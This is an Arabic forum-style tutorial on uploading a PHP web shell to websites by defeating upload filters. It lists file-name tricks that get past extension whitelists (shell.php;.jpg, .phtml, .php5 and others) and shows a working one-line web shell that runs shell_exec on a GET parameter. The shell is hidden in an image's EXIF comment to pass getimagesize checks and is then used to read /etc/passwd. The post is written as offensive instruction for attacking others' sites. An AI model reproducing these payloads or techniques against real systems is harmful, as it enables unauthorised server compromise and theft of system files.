عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك 
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة 
 الحماية حسب نوع الملف 
  كود PHP:
    if($_FILES['userfile']['type'] != "image/jpg") 
    
  لتخطي هده الحماية نستعمل تامبر داتا
 
 
 الحماية باستخدام اللائحة البيضاء 
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة 
  كود PHP:
    $valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png"); 
    
  لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف 
مثلا   |   |   |  | اقتباس |  |  |  |  |    |  |  |  |   |  | shell.jpg.php shell.jpg.PhP
 shell.php.xxxjpg
 shell.php;.jpg
 shell.php%0delete0.jpg
 shell.php.test
 .phtml
 .php3/.php4/.php5
 |  |   |  |  |  |  | 
 
 
الحماية باستخدام الدوال الخاصة بالصور
 في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة
  كود PHP:
    $imageinfo = getimagesize($_FILES['userfile']['tmp_name']); 
    
  في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب 
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot 
انا سوف اشرح  exif pilot
 http://exifpilot.com/ الموقع الرسمي للبرنامج 
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل  الشل المجهري في التعليق 
  كود PHP:
    <?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>    
   كما هو موضح في الصورة
 
 
الكود معناه ادا وجد متغير او  بارميتر اسمه لول نفد مايحتويه المتغير 
ثم نرسل امر فتح الملف etc/passwd
   |   |   |  | اقتباس |  |  |  |  |  | 
 
 
و الاستغلال يكون بهده الطريقة 
 
 
 
لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري 
على كل حال اتمنى ان اكون قد افدتك اخي